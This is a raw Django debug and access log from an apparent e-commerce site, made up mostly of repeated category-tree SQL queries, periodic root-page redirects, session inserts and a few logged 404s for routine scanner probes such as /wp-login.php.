2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 22:48:02,780 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 22:48:02,784 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 22:48:02,789 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 22:48:02,792 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 22:48:02,798 utils 2749 140297233225472 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 22:48:02,801 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 22:48:02,805 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 22:48:02,810 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 22:48:02,814 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 22:48:02,819 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 22:48:02,822 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 22:48:02,824 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 22:48:02,827 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 22:48:02,829 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 22:48:02,832 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 22:48:02,834 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 22:48:02,836 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 22:48:02,840 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 22:48:02,842 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 22:48:02,844 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 22:48:02,846 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 22:48:02,849 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 22:48:02,851 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 22:48:02,854 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 22:48:02,856 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 22:48:02,859 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 22:48:02,861 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 22:48:02,863 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 22:48:02,867 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 22:48:02,869 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 22:48:02,871 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 22:48:02,873 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 22:48:02,876 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 22:48:02,879 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 22:48:02,881 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 22:48:02,884 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 22:48:02,886 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 22:48:02,888 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 22:48:02,890 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 22:48:02,893 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 22:48:02,896 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 22:48:02,898 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 22:48:02,901 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 22:48:02,903 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 22:48:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 22:52:17] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [31/Dec/2019 22:55:11] "GET /robots.txt HTTP/1.0" 404 6341 DEBUG 2019-12-31 22:55:11,408 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'z8bgnled61dqfnzbefv12fgmtjdg5lw6' LIMIT 1; args=('z8bgnled61dqfnzbefv12fgmtjdg5lw6',) DEBUG 2019-12-31 22:55:11,410 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('z8bgnled61dqfnzbefv12fgmtjdg5lw6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T22:55:11.409079+00:00'::timestamptz); args=('z8bgnled61dqfnzbefv12fgmtjdg5lw6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 22, 55, 11, 409079, tzinfo=)) [31/Dec/2019 22:55:11] "GET /login/?next=%2F HTTP/1.0" 200 1788 [31/Dec/2019 22:57:19] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:05:02] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:15:07] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [31/Dec/2019 23:16:45] "GET /manager/html HTTP/1.0" 404 6346 [31/Dec/2019 23:20:15] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:25:17] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:30:20] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 23:35:22] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:36:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 23:36:37,642 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rtu7ncro9p6q42ljqsm9kn3ppe5t09df' LIMIT 1; args=('rtu7ncro9p6q42ljqsm9kn3ppe5t09df',) DEBUG 2019-12-31 23:36:37,644 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rtu7ncro9p6q42ljqsm9kn3ppe5t09df', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T23:36:37.642598+00:00'::timestamptz); args=('rtu7ncro9p6q42ljqsm9kn3ppe5t09df', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 23, 36, 37, 642598, tzinfo=)) [31/Dec/2019 23:36:37] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 23:40:25] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:45:27] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:50:30] "GET / HTTP/1.0" 302 0 [31/Dec/2019 23:55:33] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 00:05:03] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:16:25] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 00:16:28,195 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2aht2xlktpnadooxr0sk4u6jpgulgc52' LIMIT 1; args=('2aht2xlktpnadooxr0sk4u6jpgulgc52',) DEBUG 2020-01-01 00:16:28,197 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2aht2xlktpnadooxr0sk4u6jpgulgc52', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T00:16:28.196390+00:00'::timestamptz); args=('2aht2xlktpnadooxr0sk4u6jpgulgc52', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 0, 16, 28, 196390, tzinfo=)) [01/Jan/2020 00:16:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Jan/2020 00:20:10] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 00:29:31] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:34:34] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 00:39:36] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:44:39] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [01/Jan/2020 00:46:59] "GET /wp-login.php HTTP/1.0" 404 6349 [01/Jan/2020 00:49:41] "GET / HTTP/1.0" 302 0 [01/Jan/2020 00:58:16] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:05:03] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:20:10] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:27:21] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:29:51] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:34:54] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:39:56] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:44:59] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:50:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:55:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 01:57:36] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 01:57:36,991 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'swfnxyl1zdzpki09r7bck3a7ed6i3kbu' LIMIT 1; args=('swfnxyl1zdzpki09r7bck3a7ed6i3kbu',) DEBUG 2020-01-01 01:57:36,993 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('swfnxyl1zdzpki09r7bck3a7ed6i3kbu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T01:57:36.992319+00:00'::timestamptz); args=('swfnxyl1zdzpki09r7bck3a7ed6i3kbu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 1, 57, 36, 992319, tzinfo=)) [01/Jan/2020 01:57:36] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Jan/2020 02:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:18:51] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:24:58] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:30:00] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:36:34] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:41:40] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:46:55] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:51:58] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:55:44] "GET / HTTP/1.0" 302 0 [01/Jan/2020 02:57:00] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:02:29] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Jan/2020 03:10:04] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:20:00] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:25:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:30:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:35:07] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:38:45] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:40:10] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:45:12] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [01/Jan/2020 03:49:25] "GET /wp-login.php HTTP/1.0" 404 6350 [01/Jan/2020 03:50:15] "GET / HTTP/1.0" 302 0 [01/Jan/2020 03:55:18] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:12:19] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:17:21] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:22:24] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:27:26] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:32:28] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:37:31] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:38:37] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:42:33] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:44:13] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:50:45] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:51:06] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 04:51:09,269 utils 2749 140297233225472 